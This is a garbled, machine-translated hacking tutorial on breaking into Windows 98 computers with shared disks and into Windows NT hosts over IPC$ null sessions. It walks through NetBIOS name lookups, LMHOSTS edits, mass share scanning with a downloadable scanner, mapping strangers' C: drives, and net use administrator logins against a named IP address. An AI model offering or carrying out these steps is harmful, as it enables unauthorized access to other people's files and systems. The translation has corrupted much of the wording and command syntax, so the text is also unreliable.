Several methods regarding invasive Windows98 systems (hosts with shared discs):
I. The simplest type of software invasion:
(1) Turning a paragraph IP with moonlight to get a computer name of some IP hosts
(2) In the Windows directory, there is a file named lmhosts.sam, renamed the LMHOSTS (no suffix), delete its content, write the other party's IP and computer name, write files in the following format: XX.xx.xx.xx Computer name (Enter)
(3) Right-click Network Neighborhood - Find - Enter the other computer name in the computer, and the other computer clicks can enter.
II. A slightly complex tool:
(1). Judging the place to the Internet, open a DOS window to type tracert xx.xx.xx.xx (XX refers to IP)
The information reflected in the fourth and 5th lines is both the internet location of each other.
(2). Get the name of the other computer, open a DOS window Type NBTSTAT -A XX.xx.xx.xx
The first line is the other computer name. The second line is the working group where the other computer is located, and the third line is the instructions for the other computer.
(3). In the Windows directory, there is a file named lmhosts.sam, renamed LMHOSTS, delete its content, write the other party's IP and computer name to write files: xx.xx.xx.xx computer name
(4). On the DOS window Type NBTSTAT -R
(5). At the beginning - Find - Enter the other computer name in the computer, the other computer clicks can be entered.
Third, complete fool tool articles:
Legion 2.1 everyone can download here. Http://warex.box.sk/files/scanners/legion.zip (can also use the network assassin). After running, in the main interface, we can see. There are two single options in the box of the Scan Type Scan Type, one is the scanrange scan range, which is to scan a section of IP address. The other is the SCAN List scan list, which is scanned for the IP list in a file file. The default is the selected Scan Range We don't change it.
The following is a Connection speed connection speed. There is SLOWER, 28.8kps, 56kps, FASTER.
You can adjust according to your speed. Here we choose 56kps, of course, if you are an education network access, or you can scan the machine network in the domain network, we can choose Faster. The fastest, let our scan speed faster. One of the right is two IP edit boxes, we enter the IP range to scan. such as
203.203.1.1 ------ 203.203.1.254 Scan a Class C IP or
203.203.1.1 ------ 203.203.254.254 Scan a Class B IP.
After a few minutes, we came back. It is found that some characters appear on the left and right on the main interface of the program main interface. The left is to find a shared I P address. On the right is to find a shared number. Generally, on the right is // IP / found shared name. Many shares you will find // ip / c // ip / d // ip / e, etc. Such sharing is usually the entire C, D, and E disk of others. Let's take a look // ip / c. In the IP list on the left, we find the IP below with C drive. Then click the Map Drive Map Network Dry. OICQ: 9750406 It will pop up a window prompt you // IP / C has been mapped into g or other drive characters. Now that we can find a network disk G in my computer. When we open the C drive, we can go in.
Fourth, the most complicated type (simple tutorial invasion of Winnt): First let us learn some basic knowledge.
1, first is the Net View command.
Role: Display domain list, computer list, or a list of shared resources for specified computers.
Command format: Net view [// computername / domain [: domainname]
Parameter introduction:
(1) Type NET View to display the list of computers of the current domain.
(2) // computername Specifies the computer to view its shared resource.
(3) / domain [: domainname] Specifies to view the domain of its available computer.
Simple example:
(1) Net View // Host View the list of shared resources for Host. Host can be IP or a domain name.
(2) NET View / Domain: Love View the list of machines in the LOVE domain.
2, followed by learning the NET USE command.
Role: Connect the computer or disconnect the computer and the shared resource connection, or display the connection information of your computer.
Command format: net use [deviceName *] [// computername / sharename [/ volume] [password *] [/ user: [domainname /] username] [/ delete] [/ personistent: {yes no]}
Parameter introduction: Type NET Use of NET Use without parameters to list network connections.
DeviceName Specifies the name of the resource to be connected or the device name to be disconnected.
// Computername / ShareName server and shared resources name.
Password Access the password for shared resources. * Tip Type password.
/ User specifies another user that is connected.
DomainName Specifies another domain.
UserName Specifies the username of the login.
/ HOME connects the user to its host directory.
/ DELETE Cancels the specified network connection.
/ Persistent controls the use of permanent network connection.
Simple case:
(1) NET USE E: // Host / TEMP is set to the E disk in // Host / Temp directory
(2) NET USE E: // Host / TEMP / DELETE Disconnect Connection
(3) NET USE // Host "Password" / user: "administrator"
3.NET Share effect: Create, delete, or display shared resources.
Command format: Net Share ShareName = Driveath [/ users: Number / unlimited] [/ Remark: "text"]
Parameter introduction:
(1) Type NET Share without parameters Displays information on all shared resources on the local computer.
(2) ShareName is the network name of shared resources.
(3) Driveath specifies the absolute path to the shared directory.
(4) / Users: Number settings can access the maximum number of users for shared resources at the same time.
(5) / unlimited does not limit the number of users who simultaneously access the shared resource.
(6) / Remark: "text" Add a comment on the resource, and the text is taken by quotation marks.
Simple case:
(1) NET Share MyLove = C: / Temp / Remark: "My First Share" Share C: / Temp with MyLOVE for shared name
(2) NET Share MYLOVE / DELETE Stop Sharing MYLOVE Directory
4.NET User effect: Add or change user accounts or display user account information. This command can also be written as NET Users.
Command format: Net user [username [password *] [options] [/ domain]
Parameter introduction:
(1) Type NET User without parameters to view a list of user accounts on your computer.
(2) UserName Add, delete, change, or view the user account name.
(3) Password assigns or change the password for the user account.
(4) * Tip Enter the password.
(5) / Domain executes the operation in the main domain controller of the computer main domain.
Simple case:
NET user yfang View User Yfang Information
5. What is going on again to learn IPC connections. Let's take a look at IPC. It is originally the meaning of Unix process communication. Here I am talking about the IPC under Windows. He is mainly the resource of the named pipe, which is important for the communication between the program. Use when you remotely manage your computer and view your computer's shared resource. Under Windows, it is implemented with a NET command. In the test report, we can often see the words of the empty connection. Many people don't know what is empty. He is actually the IPC connection of the password and the username: NET USE // ip "/ user:" "
Assuming that we successfully detected the password of the super administrator Administrator of NT host 211.21.193.202 in Taiwan.
NT remote login command line syntax: NET USE // IP Address / IPC $ ["Password"] / user: "username"
Syntax exiting landing: NET USE // IP Address / IPC $ / Delete
Net use //211.21.193.202/ipc $ "" / user: "administrator"
If displayed: The command successfully completed the remote login of our via IPC. .